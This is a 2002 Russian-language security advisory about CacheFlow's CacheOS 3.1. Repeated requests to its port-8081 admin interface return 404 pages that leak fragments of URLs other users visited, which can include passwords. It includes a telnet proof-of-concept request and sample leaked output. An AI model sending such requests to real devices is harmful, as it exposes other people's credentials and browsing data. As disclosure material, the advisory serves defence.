Security Lab

Несанкционированный доступ к CacheOS

Дата публикации:09.01.2002
Всего просмотров:990
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

CacheOS - изделие, используемое устройствами Web кэширования сделанными CacheFlow, которое является мини сервером с RAID контроллером и предустановленной опрерационной системой.


CacheFlow имеет Web интерфейс администрирования, открытый на 8081 порту по умолчанию. Посылая определенно составленный запрос, злонамеренный нападающий может просматривать определенные кэшированные со временем Web страницы.Используя этот метод, можно собрать информацию об имени пользователя/пароле, содержание формы, содержание формы, URL и т.д.
Уязвимость найдена в CacheOS 3.1
Пример:

соединитесь с 8081 портом, затем выполните следующую команду:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 200 OK
Request cannot be honored
Connection closed by foreign host

Однако если вы пробуете несколько раз, запрос когда-нибудь возвратит кое-что вроде
этого:

localhost:~# telnet cacheflow 8081
Trying xxx.xxx.xxx.xxx...
Connected to cacheflow.
Escape character is '^]'.
GET /Secure/Local/console/cmhome.htm

HTTP/1.0 404-Not Found

404 Not Found

404 Not Found

The
request
ed URL "/Secure/Local/console/cmhome.htm

Easp&o=0&sv=za5cb0d78&qid= E2BCA8F417ECE94DBDD27B75F951FFDA&uid=
2c234acbec234acbe&sid=3c234acbec234acbe&ord=1" was not found on this
server.

Connection closed by foreign host.

Как видно, кусок кода в 404 страницах содержит часть URL, который клиент посещал в то время. Используя Эту технику, можно читать пароли и т.п.
 

Ссылки: http://www.cacheflow.com/